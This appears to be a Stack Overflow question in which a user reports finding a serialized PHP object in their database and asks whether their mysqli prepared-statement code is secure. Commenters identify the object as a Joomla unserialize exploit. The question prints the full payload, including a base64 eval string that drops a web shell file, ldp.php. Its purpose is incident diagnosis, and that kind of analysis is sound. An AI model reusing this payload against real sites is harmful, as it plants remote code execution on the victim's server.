0

Today I saw this in my sql database:

| *some data*   | }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:
{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:
{}s:8:"feed_url";s:207:"
eval(base64_decode(ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2xkcC5waHAnLCdFRTlBQUVFQzREOEU0NDM5Mjk5MDQ2QjhDREIzRjc4MiA8P3BocCBAZXZhbCgkX1BPU1RbImZrIl0pOycpOw));
JFactory::getConfig();
exit;";
s:19:"cache_name_function";
s:6:"assert";s:5:"cache"
;b:1;s:11:"cache_class";
O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}�      |

I`m using this code to put data into database :

// Create connection
$conn = new mysqli($servername, $username, $password, $dbname);
// Check connection
if ($conn->connect_error) {
die("Connection failed: " . $conn->connect_error);
} 

$stmt = $conn->prepare("INSERT INTO $TABLE (VALUE, DEVICE) VALUES (?, ?)");
$stmt->bind_param("ss", $VALUE, $DEVICE);

$stmt->execute();
$stmt->close();
$conn->close();
?>

Am i safe ?

Is my code secure or should I add another layer of security?

Sam M
  • 4,136
  • 4
  • 29
  • 42
Adrian yo
  • 25
  • 2
  • 6
  • You can use regular expressions to validate $VALUE, $DEVICE before inserting into database. – Abhishek Sinha Jul 19 '18 at 01:01
  • Read about [cross-site scripting](https://en.wikipedia.org/wiki/Cross-site_scripting). – Dan Guzman Jul 19 '18 at 01:02
  • Seems to be a vulnerability in your version of Joomla https://blog.cloudflare.com/the-joomla-unserialize-vulnerability/ – Havenard Jul 19 '18 at 01:06
  • Possible duplicate of [How can I prevent SQL injection in PHP?](https://stackoverflow.com/questions/60174/how-can-i-prevent-sql-injection-in-php) – Sam M Jul 19 '18 at 01:06
  • 2
    The data in your database is a serialized PHP object. Your use of query parameters are fine, so `$VALUE` and `$DEVICE` cannot cause problems. But what is the value of `$TABLE`? If that comes from untrusted content, it could be an SQL injection vulnerability. – Bill Karwin Jul 19 '18 at 01:37
  • FYI, that string in the database looks like it's the result of calling `serialize()` on a mysqli object. – Barmar Jul 19 '18 at 01:40
  • Ooo - that is nasty. "ZmlsZ..." tries to write 'ldp.php' to your disk. Possibly the hacker will later try to execute it later. This looks more like trying to hack into Javascript instead of (or via?) PHP/MySQL. See if there is such a file in your 'DOCUMENT_ROOT'. – Rick James Jul 19 '18 at 19:48
  • @Rick James So for what file name should I look in my root folder ? I have bunch of files there. – Adrian yo Jul 20 '18 at 18:52
  • `ldp.php` is what I decoded from the `eval` argument. – Rick James Jul 20 '18 at 19:00
  • I dont have anything like this in root folder. Thank you for help. – Adrian yo Jul 21 '18 at 21:42

0 Answers0